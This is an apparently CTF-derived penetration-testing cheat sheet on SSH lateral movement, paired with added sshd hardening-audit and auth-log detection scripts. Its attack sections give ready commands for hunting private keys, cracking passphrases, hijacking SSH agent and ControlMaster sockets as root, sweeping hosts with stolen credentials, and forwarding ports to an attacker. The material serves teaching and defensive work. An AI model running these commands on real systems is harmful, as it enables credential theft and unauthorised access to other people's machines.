SSH Lateral Movement
# Overview
SSH is the primary remote access protocol for Linux/Unix systems and is increasingly available on Windows (OpenSSH Server). SSH lateral movement leverages discovered credentials, stolen private keys, SSH agent forwarding exploitation, and connection multiplexing (ControlMaster). Key reuse across hosts is common in environments without centralized authentication, making SSH key theft particularly valuable.
# Prerequisites
- Valid SSH credentials (username/password or private key)
- TCP port 22 (or the non-standard port sshd listens on) reachable from the source host
- SSH client (built-in on all Unix/Linux systems)
# Exploitation / Execution
## 1. SSH with Found Credentials
```bash
ssh <user>@<IP>                          # Password-based login
ssh <user>@<IP> -p <port>                # Non-standard port
sshpass -p '<password>' ssh <user>@<IP>  # Non-interactive password login
```
## 2. SSH with Stolen Private Key
```bash
# Discover keys on compromised host
find / -name "id_rsa" -o -name "id_dsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null
grep -r "BEGIN.*PRIVATE KEY" /home/ 2>/dev/null
# Copy to attacker machine, set permissions, and connect
chmod 600 stolen_key
ssh -i stolen_key <user>@<IP>
# If key is password-protected, crack it
ssh2john stolen_key > key.john
john key.john --wordlist=/usr/share/wordlists/rockyou.txt
```
## 3. SSH Agent Forwarding Exploitation
If SSH agent forwarding is enabled on the compromised host, an attacker can use the forwarded agent to authenticate to other hosts:
```bash
# On compromised host, check for agent socket
echo $SSH_AUTH_SOCK
ls -la $SSH_AUTH_SOCK
# Use the agent to connect to other hosts
ssh -A <user>@<next_target>   # Forward agent through this connection
# List loaded keys in agent
ssh-add -l
# Exploitation: if you have root on the compromised host, use the victim's agent socket
# (a glob does not expand inside a variable assignment, so resolve the socket path first)
export SSH_AUTH_SOCK=$(ls /tmp/ssh-*/agent.* | head -n 1)
ssh <user>@<next_host>        # Authenticate as victim
```
## 4. SSH ControlMaster Multiplexing
ControlMaster multiplexes new sessions over an existing SSH connection; because the master connection has already authenticated, sessions that attach to its control socket do not authenticate again:
```bash
# Check for existing ControlMaster sockets
ls -la ~/.ssh/controlmasters/ 2>/dev/null
find /tmp -name "ssh-*" -user <target_user> 2>/dev/null
# If found and accessible, use it
ssh -S /path/to/socket <user>@<host>
ssh -o ControlPath=/path/to/socket <user>@<host>
```
## 5. SSH Key Reuse Across Hosts
```bash
# After obtaining a private key from one host, test it against all known hosts
for ip in $(cat targets.txt); do
  ssh -i stolen_key -o BatchMode=yes -o ConnectTimeout=5 <user>@$ip "hostname; whoami" 2>/dev/null
done
# Also test with discovered passwords
for ip in $(cat targets.txt); do
  sshpass -p '<password>' ssh -o ConnectTimeout=5 <user>@$ip "hostname; whoami" 2>/dev/null
done
```
## 6. SSH Config Parsing for Internal Hosts
SSH config files often reveal internal hostnames, usernames and the key files (credentials) used to reach them:
```bash
cat ~/.ssh/config         # User SSH config
cat /etc/ssh/ssh_config   # System SSH config
grep -r "HostName\|User\|IdentityFile" ~/.ssh/ 2>/dev/null
grep ssh ~/.bash_history  # SSH commands from history
```
## 7. Forwarding Ports via SSH for Internal Access
```bash
# Local port forwarding (access internal service through compromised host)
ssh -L <local_port>:<internal_host>:<internal_port> <user>@<compromised_host>
# Dynamic SOCKS proxy (access entire internal network through host)
ssh -D 1080 <user>@<compromised_host>   # Use with proxychains
# Remote port forwarding (expose a service reachable from the compromised host to the attacker machine)
ssh -R <attacker_port>:localhost:<local_port> <user>@<attacker_IP>
```
# Common Pitfalls
- ⚠️ A private key must not be readable by group or others (`chmod 600 key`) or SSH will refuse to use it
- ⚠️ Host key verification prompts block automated scripts -> use `-o StrictHostKeyChecking=no` (with caution)
- ⚠️ SSH agent forwarding exposes the user's keys to anyone with root on intermediate hosts
- ⚠️ ControlMaster sockets may have restricted permissions preventing reuse
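Hardening audit for the sshd settings that bound techniques 3 and 7 above (agent forwarding, TCP forwarding, password and root login) and the logging the OPSEC notes rely on. This is an added example, not part of the original notes: a POSIX shell script that reads an `sshd_config` path given as its argument and reports where the effective global value differs from a baseline that is this example's own assumption, not a standard. It respects the two `sshd_config` rules that make casual reviews wrong: the first occurrence of a keyword wins, and everything after the first `Match` line is conditional. The sample config it writes is constructed.

```shell
#!/bin/sh
# Added example (not from the original notes): audit an sshd_config against
# a baseline. The baseline below is this example's assumption.
#
# sshd_config rules this has to respect:
#   * keywords are case-insensitive
#   * for each keyword the FIRST occurrence wins; later ones are ignored
#   * lines after the first "Match" line apply conditionally, so only the
#     lines before it are global defaults
# (the "Keyword=value" spelling is not handled here; only "Keyword value")

# sshd_effective FILE KEYWORD -> prints the effective global value, or "default"
# when the file does not set it (sshd's built-in default then applies, e.g.
# AllowAgentForwarding yes, AllowTcpForwarding yes, PasswordAuthentication yes,
# PermitRootLogin prohibit-password, LogLevel INFO).
sshd_effective() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
        tolower($1) == "match" { exit }              # stop at first Match block
        /^[ \t]*#/ || NF == 0 { next }               # skip comments and blanks
        tolower($1) == key && !found {
            found = 1; $1 = ""; sub(/^[ \t]+/, ""); print; exit
        }
        END { if (!found) print "default" }
    ' "$1"
}

# sshd_audit FILE -> one line per deviation ("KEYWORD: got X, want Y");
# exit status 0 only when the file matches the baseline.
sshd_audit() {
    file="$1"; findings=0
    for pair in \
        "PasswordAuthentication no" \
        "PermitRootLogin no" \
        "AllowAgentForwarding no" \
        "AllowTcpForwarding no" \
        "LogLevel VERBOSE"
    do
        key=${pair%% *}; want=${pair#* }
        got=$(sshd_effective "$file" "$key")
        if [ "$(printf '%s' "$got" | tr 'A-Z' 'a-z')" != "$(printf '%s' "$want" | tr 'A-Z' 'a-z')" ]; then
            echo "$key: got $got, want $want"
            findings=$((findings + 1))
        fi
    done
    [ "$findings" -eq 0 ]
}

# Constructed sample config. The second PasswordAuthentication line is the one
# an admin might believe is active, but sshd uses the first. The settings under
# "Match User backup" only apply to that user, not globally.
write_sample_config() {
    cat > "$1" <<'EOF'
# constructed sshd_config sample
Port 22
PasswordAuthentication yes
PermitRootLogin no
AllowTcpForwarding no
PasswordAuthentication no
Match User backup
    AllowAgentForwarding no
    LogLevel VERBOSE
EOF
}

# Usage when run directly: sh sshd_audit.sh /etc/ssh/sshd_config
if [ -n "$1" ] && [ -f "$1" ]; then
    sshd_audit "$1" && echo "no deviations from baseline"
fi
```

On the constructed sample the audit reports three deviations: `PasswordAuthentication` (first occurrence is `yes`), `AllowAgentForwarding` and `LogLevel` (both only set inside the `Match` block, so globally still at their defaults). Run it against `sshd -T` output instead of the raw file when Match blocks and includes make the raw file hard to reason about; `sshd -T` prints the fully resolved configuration, one keyword per line, in lowercase.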
# OPSEC Considerations
- 🛡️ Every SSH login writes an `Accepted publickey` / `Accepted password` line to the auth log on Linux (`/var/log/auth.log`, or the journal on systemd-only distributions) showing user, source IP and, for key logins, the key fingerprint
- 🛡️ Key-based logins are logged, but the log line cannot distinguish legitimate use of a key from an attacker using a stolen copy; only source IP and timing differ
- 🛡️ Agent forwarding exploitation leaves no credential traces on the intermediate host beyond the initial SSH connection, although the downstream host still logs an `Accepted publickey` from the intermediate host's IP
- 🛡️ Port forwarding creates listening ports on the compromised host (`ss -tlnp` / `netstat -tlnp`) visible to administrators
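Detection side of the notes above, as an added example that is not part of the original page: a POSIX shell script (awk-based) that parses sshd `Accepted` lines from a collected auth log and surfaces the three signals the OPSEC bullets point at: one key fingerprint accepted from more than one source address (the key reuse of technique 5), any successful password login, and one source address reaching many distinct hosts. The log lines, host names, addresses and fingerprints are constructed sample data; the script assumes the stock syslog line layout where the hostname is the fourth field.

```shell
#!/bin/sh
# Added example (not from the original notes): triage sshd "Accepted" lines
# from a collected auth log. All sample data below is constructed.

# Constructed sample: sshd logs from three hosts as a central syslog collector
# would hold them. Fingerprints are made up. Field 4 is the hostname.
write_sample_log() {
    cat > "$1" <<'EOF'
Mar  3 09:12:01 web01 sshd[2210]: Accepted publickey for deploy from 10.0.1.5 port 51234 ssh2: ED25519 SHA256:AAAAconstructedkey1
Mar  3 09:15:44 web01 sshd[2231]: Accepted password for alice from 10.0.1.5 port 51240 ssh2
Mar  3 09:40:10 db01 sshd[1877]: Accepted publickey for deploy from 10.0.1.5 port 40011 ssh2: ED25519 SHA256:AAAAconstructedkey1
Mar  3 11:02:33 web01 sshd[2402]: Accepted publickey for deploy from 10.0.9.77 port 40020 ssh2: ED25519 SHA256:AAAAconstructedkey1
Mar  3 11:03:01 db01 sshd[1902]: Accepted publickey for deploy from 10.0.9.77 port 40031 ssh2: ED25519 SHA256:AAAAconstructedkey1
Mar  3 11:05:12 app02 sshd[990]: Accepted publickey for backup from 10.0.9.77 port 40050 ssh2: RSA SHA256:BBBBconstructedkey2
Mar  3 11:06:00 app02 sshd[1001]: Accepted password for root from 10.0.9.77 port 40061 ssh2
Mar  3 12:00:00 web01 sshd[2500]: Failed publickey for deploy from 10.0.9.77 port 40070 ssh2: ED25519 SHA256:CCCCconstructedkey3
EOF
}

# ssh_accepts FILE -> "host method user ip fingerprint" per successful login
# (fingerprint is "-" for password logins). Fields are located by their
# keywords ("for", "from", "SHA256:") rather than fixed positions.
ssh_accepts() {
    awk '
        /sshd\[[0-9]+\]: Accepted (publickey|password) for / {
            user = ip = "-"; fp = "-"
            for (i = 1; i <= NF; i++) {
                if ($i == "Accepted") method = $(i + 1)
                else if ($i == "for") user = $(i + 1)
                else if ($i == "from") ip = $(i + 1)
                else if ($i ~ /^SHA256:/) fp = $i
            }
            print $4, method, user, ip, fp
        }' "$1"
}

# keys_from_multiple_sources FILE -> "fingerprint ip1 ip2 ..." for each key
# accepted from more than one source address (key copied or stolen indicator)
keys_from_multiple_sources() {
    ssh_accepts "$1" | awk '
        $2 == "publickey" && !seen[$5, $4]++ { ips[$5] = ips[$5] " " $4; n[$5]++ }
        END { for (k in n) if (n[k] > 1) print k ips[k] }'
}

# password_logins FILE -> "host user ip" for every successful password login;
# where PasswordAuthentication is meant to be off fleet-wide, any hit matters
password_logins() {
    ssh_accepts "$1" | awk '$2 == "password" { print $1, $3, $4 }'
}

# source_fanout FILE MIN_HOSTS -> "ip host_count" for source addresses that
# logged in to at least MIN_HOSTS distinct hosts (one client sweeping hosts)
source_fanout() {
    ssh_accepts "$1" | awk -v min="$2" '
        !seen[$4, $1]++ { hosts[$4]++ }
        END { for (ip in hosts) if (hosts[ip] >= min) print ip, hosts[ip] }'
}

# Usage when run directly: sh ssh_triage.sh /var/log/auth.log
if [ -n "$1" ] && [ -f "$1" ]; then
    echo "== keys accepted from more than one source =="; keys_from_multiple_sources "$1"
    echo "== password logins =="; password_logins "$1"
    echo "== sources reaching 3+ hosts =="; source_fanout "$1" 3
fi
```

On the constructed sample, `keys_from_multiple_sources` reports the deploy key seen from both `10.0.1.5` and `10.0.9.77`, `password_logins` reports alice on web01 and root on app02, and `source_fanout` with a threshold of 3 reports `10.0.9.77`, which touched all three hosts within a few minutes. The fingerprint check is only possible because sshd logs the key fingerprint on the `Accepted publickey` line; correlating it across hosts requires the logs to be collected centrally, since a single host only ever sees its own logins.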
# Post-Exploitation Value
- Interactive shell on additional Linux hosts
- Pivot point for internal network access (port forwarding, SOCKS proxy)
- Key reuse testing may reveal access to previously unknown hosts
- SSH config files reveal internal network topology and infrastructure details
# Cross-References
## Tool References
| Tool | Link |
|---|---|
| sshpass | Available via apt/brew |
| proxychains | https://github.com/haad/proxychains |
## Source Machines
- Soccer (Easy, Linux) - SSH access with player credentials from SQL injection
- Clicker (Medium, Linux) - SSH key recovery via XXE for root access
- Usage (Easy, Linux) - SSH access via cracked credentials from SQL injection